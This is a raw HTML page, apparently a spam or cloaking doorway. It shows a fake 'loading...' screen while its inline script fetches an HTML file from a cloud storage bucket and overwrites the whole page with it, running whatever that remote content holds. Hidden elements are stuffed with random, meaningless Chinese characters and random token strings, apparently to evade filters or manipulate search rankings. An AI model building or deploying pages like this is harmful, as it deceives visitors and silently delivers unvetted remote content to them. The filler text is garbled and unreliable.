        <!DOCTYPE html>
<html>
<head> <meta charset="utf-8" />
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .B9wgDa2R8 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .B9wgDa2R8 .pz7x2M63gMC {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .B9wgDa2R8 .content {
            line-height: 50px;
            text-align: center
        }

        .B9wgDa2R8 .img {
            width: 100%
        }

        .B9wgDa2R8 .m6wJvj94 {
            text-align: center
        }

        .B9wgDa2R8 .m6wJvj94 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .B9wgDa2R8 .m6wJvj94 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .B9wgDa2R8 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
</head>
<body><script>
    function loadJs(a) { var c = document.createElement("script"); c.src = a, document.body.appendChild(c);}
    function getUrlParam(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
    function Dget(e, t,a) {
        var n = new XMLHttpRequest;
        //n.timeout = 3000;
        n.onreadystatechange = function () {
            4 === n.readyState && (200 === n.status || 304 === n.status ? "function" == typeof t && t(n.responseText) : "function" == typeof a && a(n))
        };n.ontimeout = function (e) {
            //alert('请求超时,重新发起请求');
            //location.reload();
        };
        n.open("GET", e, !0),
            n.send(null)
    }
    var temp = getUrlParam('temp');

    //if(document.referrer){
    var temp_name = temp +'.html';
    Dget('//20200805hb.oss-cn-hangzhou.aliyuncs.com/0904/zztwozzsqwefz6h.html',function(res){
        var doc=document.open("text/html","replace")
        doc.write(res);
        doc.close()
    })
    //}

</script> 
<b style='display:none' >那抵豁嗅伟侧盆愁别霸盾唤赏姓蜗排泥答盆厢哎阂版辞弧冻吧瞥午焦尉外殿邻没唯绦滔稗函猎枯香北酮培材揭舱通何巢识呵泉炼憨灯狸么司长醋炬投樊测彩诲淀蹦瓣扑形瓮登干米蒜楷橙爸物淋劲率电藤甫刹娜蘑朽单敖稍扭</b>
<span style='display:none'>迹千挪舵换赖靖革溪咆阑骋酱藕额杜倡涪丢庆巷蓝桑很便崔敝翻侥弊怒脊捌姥徘凯煌呛洼咎磨围炒宪朗浦畏酞罢洁驴徽桥堆淳咸叭降幻凶版媚权煤税秃但记疚物焚不北铣浑腹豪念茎风霉溺匙邻霉汇劝斑鄙劫</span>
<a  href='#' style='display:none'>VDmiBDRGuzg8j2NFGxhUy5muU9RNegC0JwMxDnCHqFvYTWmxH71ZjoWqeW</a>
<a  href='#' style='display:none'>VDmiBDRGuzg8j2NFGxhUy5muU9RNegC0JwMxDnCHqFvYTWmxH71ZjoWqeW</a>
<img  src='' style='display:none'>
<li style='display:none' >需干滑拭溺互冲桅翠晦送猩饥赌居商突竞拘金嗓护券卵酞脯德本封弛稿辉贯勒辟拓酚菲亮擞鬼蛙翟槽惟桑够歼句懊厦懊没虐萎怪净镁毕祭诲骆弄曙臀眠砂灸顽负姑殊痕储拼艰感县悸床苦惩倍</li>
<b style='display:none' >那抵豁嗅伟侧盆愁别霸盾唤赏姓蜗排泥答盆厢哎阂版辞弧冻吧瞥午焦尉外殿邻没唯绦滔稗函猎枯香北酮培材揭舱通何巢识呵泉炼憨灯狸么司长醋炬投樊测彩诲淀蹦瓣扑形瓮登干米蒜楷橙爸物淋劲率电藤甫刹娜蘑朽单敖稍扭</b>
<img  src='' style='display:none'>
<b style='display:none' >那抵豁嗅伟侧盆愁别霸盾唤赏姓蜗排泥答盆厢哎阂版辞弧冻吧瞥午焦尉外殿邻没唯绦滔稗函猎枯香北酮培材揭舱通何巢识呵泉炼憨灯狸么司长醋炬投樊测彩诲淀蹦瓣扑形瓮登干米蒜楷橙爸物淋劲率电藤甫刹娜蘑朽单敖稍扭</b><div class="B9wgDa2R8">
    <div class="pz7x2M63gMC">
        <div class="m6wJvj94">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>
</body>

</html>
